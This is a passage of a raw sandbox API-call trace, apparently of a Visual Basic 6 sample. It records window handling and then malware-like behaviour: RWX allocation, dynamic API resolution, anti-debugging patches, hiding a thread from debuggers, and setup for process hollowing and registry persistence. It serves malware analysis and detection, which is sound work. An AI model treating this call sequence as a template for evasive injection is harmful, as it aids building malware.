(lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x7c, wParam=0xfffffff0, lParam=0x18f470) returned 0x0 [0096.763] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x7d, wParam=0xfffffff0, lParam=0x18f470) returned 0x0 [0096.763] InvalidateRect (hWnd=0x7001a, lpRect=0x0, bErase=0) returned 1 [0096.763] PostMessageA (hWnd=0xb0094, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0096.763] IsIconic (hWnd=0xb0094) returned 0 [0096.763] PostMessageA (hWnd=0x7001a, Msg=0x100e, wParam=0x3, lParam=0x0) returned 1 [0096.764] PostMessageA (hWnd=0xb0094, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0096.764] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0096.766] IsIconic (hWnd=0xb0094) returned 0 [0096.766] IsIconic (hWnd=0xb0094) returned 0 [0096.766] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0096.767] GetParent (hWnd=0xb0094) returned 0x0 [0096.767] GetWindowRect (in: hWnd=0xb0094, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0096.767] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0096.767] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 382402560 [0096.767] GetClientRect (in: hWnd=0xb0094, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0096.767] MapWindowPoints (in: hWndFrom=0xb0094, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 8192339 [0096.768] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0096.768] IsWindowVisible (hWnd=0xb0094) returned 1 [0096.768] IsIconic (hWnd=0xb0094) returned 0 [0096.768] IsZoomed (hWnd=0xb0094) returned 0 [0096.768] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x5, wParam=0x0, lParam=0x2a002fa) returned 0x0 [0096.769] GetClientRect (in: hWnd=0xb0094, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0096.769] GetWindow (hWnd=0xb0094, uCmd=0x5) returned 0x7001a [0096.769] GetWindow (hWnd=0x7001a, uCmd=0x2) returned 0x15026e [0096.769] GetParent (hWnd=0x7001a) returned 0xb0094 [0096.769] GetWindow (hWnd=0x15026e, uCmd=0x2) returned 0x20272 [0096.769] GetParent (hWnd=0x15026e) returned 0xb0094 [0096.769] GetWindow (hWnd=0x20272, uCmd=0x2) returned 0x0 [0096.769] GetParent (hWnd=0x20272) returned 0xb0094 [0096.769] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x3, wParam=0x0, lParam=0x7d0153) returned 0x0 [0096.770] GetCurrentThreadId () returned 0xb44 [0096.770] PostThreadMessageA (idThread=0xb44, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0096.770] GetCurrentProcessId () returned 0x980 [0096.770] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x18) returned 0x2352088 [0096.770] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xc) returned 0x2352bc8 [0096.770] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.770] IsWindow (hWnd=0xb0094) returned 1 [0096.770] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 382402560 [0096.771] IsIconic (hWnd=0xb0094) returned 0 [0096.771] GetParent (hWnd=0xb0094) returned 0x0 [0096.771] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.771] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.771] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.771] IsWindow (hWnd=0x7001a) returned 1 [0096.771] GetWindowLongA (hWnd=0x7001a, nIndex=-16) returned 1409359873 [0096.771] IsIconic (hWnd=0xb0094) returned 0 [0096.771] GetParent (hWnd=0x7001a) returned 0xb0094 [0096.772] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.772] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.772] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.772] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.772] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.773] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.773] IsWindow (hWnd=0xb0094) returned 1 [0096.773] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 382402560 [0096.773] IsIconic (hWnd=0xb0094) returned 0 [0096.773] GetParent (hWnd=0xb0094) returned 0x0 [0096.773] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.773] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.773] GetActiveWindow () returned 0xb0094 [0096.774] GetWindowThreadProcessId (in: hWnd=0xb0094, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb44 [0096.774] GetFocus () returned 0x7001a [0096.774] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.775] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.775] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.775] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.775] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x84, wParam=0x0, lParam=0x1cb0338) returned 0x1 [0096.775] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x20, wParam=0xb0094, lParam=0x2000001) returned 0x0 [0096.779] IsWindow (hWnd=0xb0094) returned 1 [0096.779] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 382402560 [0096.779] IsIconic (hWnd=0xb0094) returned 0 [0096.779] GetCursorPos (in: lpPoint=0x18fdcc | out: lpPoint=0x18fdcc*(x=824, y=459)) returned 1 [0096.779] WindowFromPoint (Point=0x338) returned 0xb0094 [0096.780] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x84, wParam=0x0, lParam=0x1cb0338) returned 0x1 [0096.780] ScreenToClient (in: hWnd=0xb0094, lpPoint=0x18fdac | out: lpPoint=0x18fdac) returned 1 [0096.780] GetParent (hWnd=0xb0094) returned 0x0 [0096.780] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.780] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0096.780] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x200, wParam=0x0, lParam=0x14e01e5) returned 0x0 [0096.780] CreateWindowExA (dwExStyle=0x80, lpClassName="VBBubbleRT6", lpWindowName=0x0, dwStyle=0x80800000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20276 [0096.780] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x81, wParam=0x0, lParam=0x18f4d4) returned 0x1 [0096.781] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x83, wParam=0x0, lParam=0x18f4c0) returned 0x0 [0096.781] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x1, wParam=0x0, lParam=0x18f4d4) returned 0x0 [0096.781] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0096.781] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x3, wParam=0x0, lParam=0x10001) returned 0x0 [0096.781] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x154, pvParam=0x18f8ec, fWinIni=0x0 | out: pvParam=0x18f8ec) returned 1 [0096.781] CreateFontIndirectA (lplf=0x18f9c8) returned 0xf0a09e2 [0096.781] GetCapture () returned 0x0 [0096.781] GetActiveWindow () returned 0xb0094 [0096.781] GetWindowLongA (hWnd=0xb0094, nIndex=-6) returned 1922301952 [0096.782] GetCursorPos (in: lpPoint=0x18fa58 | out: lpPoint=0x18fa58*(x=824, y=459)) returned 1 [0096.782] WindowFromPoint (Point=0x335) returned 0xb0094 [0096.782] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x84, wParam=0x0, lParam=0x1cc0335) returned 0x1 [0096.782] ScreenToClient (in: hWnd=0xb0094, lpPoint=0x18fa58 | out: lpPoint=0x18fa58) returned 1 [0096.782] GetKeyState (nVirtKey=2) returned 0 [0096.782] GetKeyState (nVirtKey=4) returned 0 [0096.782] GetKeyState (nVirtKey=1) returned 0 [0096.782] GetKeyState (nVirtKey=17) returned 0 [0096.782] GetKeyState (nVirtKey=18) returned 0 [0096.782] GetKeyState (nVirtKey=16) returned 0 [0096.782] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0096.783] IsWindow (hWnd=0xb0094) returned 1 [0096.783] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 382402560 [0096.783] IsIconic (hWnd=0xb0094) returned 0 [0096.783] GetParent (hWnd=0xb0094) returned 0x0 [0096.783] TranslateMessage (lpMsg=0x18fe58) returned 0 [0096.783] DispatchMessageA (lpMsg=0x18fe58) [0096.783] IsIconic (hWnd=0xb0094) returned 0 [0096.783] IsIconic (hWnd=0xb0094) returned 0 [0096.783] BeginPaint (in: hWnd=0xb0094, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x6010a25 [0096.783] GetClientRect (in: hWnd=0xb0094, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0096.783] OleTranslateColor () returned 0x0 [0096.783] OleTranslateColor () returned 0x0 [0096.784] UnrealizeObject (h=0x231001bc) returned 1 [0096.784] OleTranslateColor () returned 0x0 [0096.784] OleTranslateColor () returned 0x0 [0096.784] SetTextColor (hdc=0x6010a25, color=0x0) returned 0x0 [0096.784] SetBkColor (hdc=0x6010a25, color=0xf0f0f0) returned 0xf0f0f0 [0096.784] FillRect (hDC=0x6010a25, lprc=0x18fa40, hbr=0x231001bc) returned 1 [0096.784] SetTextColor (hdc=0x6010a25, color=0x0) returned 0x0 [0096.784] SetBkColor (hdc=0x6010a25, color=0xf0f0f0) returned 0xf0f0f0 [0096.784] EndPaint (hWnd=0xb0094, lpPaint=0x18fa00) returned 1 [0096.800] VarUdateFromDate (in: dateIn=0x623a67eb, dwFlags=0x3fb5b1df, pudateOut=0x0 | out: pudateOut=0x0) returned 0x0 [0096.801] VarCmp (pvarLeft=0x18f824, pvarRight=0x18f7c4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.801] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xfc) returned 0x235b408 [0096.802] GetCurrentThreadId () returned 0xb44 [0096.802] GetCurrentThreadId () returned 0xb44 [0096.802] GetCurrentThreadId () returned 0xb44 [0096.802] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xa) returned 0x2352be0 [0096.802] SetWindowTextA (hWnd=0x50134, lpString="Absorber4") returned 1 [0096.802] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0xc, wParam=0x0, lParam=0x2352be0) returned 0x1 [0096.802] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x1) returned 0x235b510 [0096.802] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xa) returned 0x2352bf8 [0096.803] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0xa) returned 0x2352c10 [0096.803] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x15) returned 0x23520a8 [0096.803] VarUdateFromDate (in: dateIn=0x0, dwFlags=0x40e35e80, pudateOut=0x0 | out: pudateOut=0x0) returned 0x0 [0096.803] VarCmp (pvarLeft=0x18f824, pvarRight=0x18f7c4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.804] VarBstrCmp (bstrLeft="aa", bstrRight="a", lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.804] IsWindowVisible (hWnd=0xb0094) returned 1 [0096.804] IsIconic (hWnd=0xb0094) returned 0 [0096.804] IsZoomed (hWnd=0xb0094) returned 0 [0096.804] ShowWindow (hWnd=0xb0094, nCmdShow=0) returned 1 [0096.804] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0096.805] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x46, wParam=0x0, lParam=0x18f48c) returned 0x0 [0096.805] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x46, wParam=0x0, lParam=0x18f48c) returned 0x0 [0096.805] GetParent (hWnd=0xb0094) returned 0x0 [0096.805] GetWindowRect (in: hWnd=0xb0094, lpRect=0x18f0b4 | out: lpRect=0x18f0b4) returned 1 [0096.805] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x47, wParam=0x0, lParam=0x18f48c) returned 0x0 [0096.805] GetWindowLongA (hWnd=0xb0094, nIndex=-16) returned 113967104 [0096.806] GetClientRect (in: hWnd=0xb0094, lpRect=0x18f124 | out: lpRect=0x18f124) returned 1 [0096.806] MapWindowPoints (in: hWndFrom=0xb0094, hWndTo=0x0, lpPoints=0x18f124, cPoints=0x2 | out: lpPoints=0x18f124) returned 8192339 [0096.806] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x47, wParam=0x0, lParam=0x18f48c) returned 0x0 [0096.809] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0096.811] GetFocus () returned 0x7001a [0096.811] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x18f108 | out: lpWndClass=0x18f108) returned 1 [0096.811] NtdllDefWindowProc_A (hWnd=0xb0094, Msg=0x1c, wParam=0x0, lParam=0xb4c) returned 0x0 [0096.811] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x1c, wParam=0x0, lParam=0xb4c) returned 0x0 [0096.811] NtdllDefWindowProc_A (hWnd=0x20276, Msg=0x1c, wParam=0x0, lParam=0xb4c) returned 0x0 [0096.812] GetWindowLongA (hWnd=0x50018, nIndex=0) returned 36970652 [0096.812] IsWindowVisible (hWnd=0x20276) returned 0 [0096.812] CallWindowProcA (lpPrevWndFunc=0x7739abd3, hWnd=0x7001a, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0101.301] VirtualAlloc (lpAddress=0x0, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x40) returned 0x2300000 [0101.312] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x2304fb8*=0x77141000, NumberOfBytesToProtect=0x2304fb0, NewAccessProtection=0x40, OldAccessProtection=0x2304fa8 | out: BaseAddress=0x2304fb8*=0x77141000, NumberOfBytesToProtect=0x2304fb0, OldAccessProtection=0x2304fa8*=0x20) returned 0x0 [0101.340] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0101.340] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.341] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0101.341] LoadLibraryA (lpLibFileName="user32") returned 0x76780000 [0101.341] GetProcAddress (hModule=0x76780000, lpProcName="EnumWindows") returned 0x7679d1cf [0101.341] EnumWindows (lpEnumFunc=0x23003b4, lParam=0x18f510) returned 1 [0101.348] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.349] GetProcAddress (hModule=0x77320000, lpProcName="NtProtectVirtualMemory") returned 0x77340028 [0101.349] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.350] GetProcAddress (hModule=0x77320000, lpProcName="DbgBreakPoint") returned 0x7733000c [0101.350] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.350] GetProcAddress (hModule=0x77320000, lpProcName="DbgUiRemoteBreakin") returned 0x773bf7ea [0101.350] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f4f8*=0x77330000, NumberOfBytesToProtect=0x18f4fc, NewAccessProtection=0x40, OldAccessProtection=0x18f500 | out: BaseAddress=0x18f4f8*=0x77330000, NumberOfBytesToProtect=0x18f4fc, OldAccessProtection=0x18f500*=0x20) returned 0x0 [0101.398] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f4f8*=0x77330000, NumberOfBytesToProtect=0x18f4fc, NewAccessProtection=0x20, OldAccessProtection=0x18f500 | out: BaseAddress=0x18f4f8*=0x77330000, NumberOfBytesToProtect=0x18f4fc, OldAccessProtection=0x18f500*=0x40) returned 0x0 [0101.514] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.515] GetProcAddress (hModule=0x77320000, lpProcName="NtSetInformationThread") returned 0x7733f99c [0101.522] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0101.523] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.523] GetProcAddress (hModule=0x77320000, lpProcName="NtAllocateVirtualMemory") returned 0x7733fab0 [0101.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f57c*=0x0, ZeroBits=0x0, RegionSize=0x18f578*=0x1c200000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18f57c*=0x3870000, RegionSize=0x18f578*=0x1c200000) returned 0x0 [0101.582] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.583] GetProcAddress (hModule=0x77320000, lpProcName="NtGetContextThread") returned 0x77340c20 [0101.583] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.583] GetProcAddress (hModule=0x77320000, lpProcName="NtSetContextThread") returned 0x77341910 [0101.583] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.584] GetProcAddress (hModule=0x77320000, lpProcName="NtWriteVirtualMemory") returned 0x7733fe04 [0101.584] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.584] GetProcAddress (hModule=0x77320000, lpProcName="NtCreateSection") returned 0x7733ff94 [0101.584] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.584] GetProcAddress (hModule=0x77320000, lpProcName="NtMapViewOfSection") returned 0x7733fc40 [0101.584] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.585] GetProcAddress (hModule=0x77320000, lpProcName="NtOpenFile") returned 0x7733fd54 [0101.585] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.585] GetProcAddress (hModule=0x77320000, lpProcName="NtClose") returned 0x7733f9d0 [0101.585] LoadLibraryA (lpLibFileName="ntdll") returned 0x77320000 [0101.585] GetProcAddress (hModule=0x77320000, lpProcName="NtResumeThread") returned 0x77340058 [0101.585] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.586] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessInternalW") returned 0x76e33bf3 [0101.586] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.586] GetProcAddress (hModule=0x76e10000, lpProcName="GetLongPathNameW") returned 0x76e2a315 [0101.586] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.586] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0101.586] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.587] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0101.587] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.587] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0101.587] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.588] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateThread") returned 0x76e27a2f [0101.588] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.588] GetProcAddress (hModule=0x76e10000, lpProcName="AddVectoredExceptionHandler") returned 0x7739742b [0101.588] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.588] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0101.589] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.589] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0101.589] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.589] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0101.589] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.590] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSize") returned 0x76e2196e [0101.590] LoadLibraryA (lpLibFileName="kernel32") returned 0x76e10000 [0101.590] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0101.590] LoadLibraryA (lpLibFileName="shell32") returned 0x75670000 [0107.314] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteW") returned 0x75683c71 [0107.315] LoadLibraryA (lpLibFileName="shell32") returned 0x75670000 [0107.315] GetProcAddress (hModule=0x75670000, lpProcName="SHCreateDirectoryExW") returned 0x7571db61 [0107.315] LoadLibraryA (lpLibFileName="advapi32") returned 0x754b0000 [0107.315] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExA") returned 0x754c1469 [0107.316] LoadLibraryA (lpLibFileName="advapi32") returned 0x754b0000 [0107.316] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExA") returned 0x754c14b3 [0107.321] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, 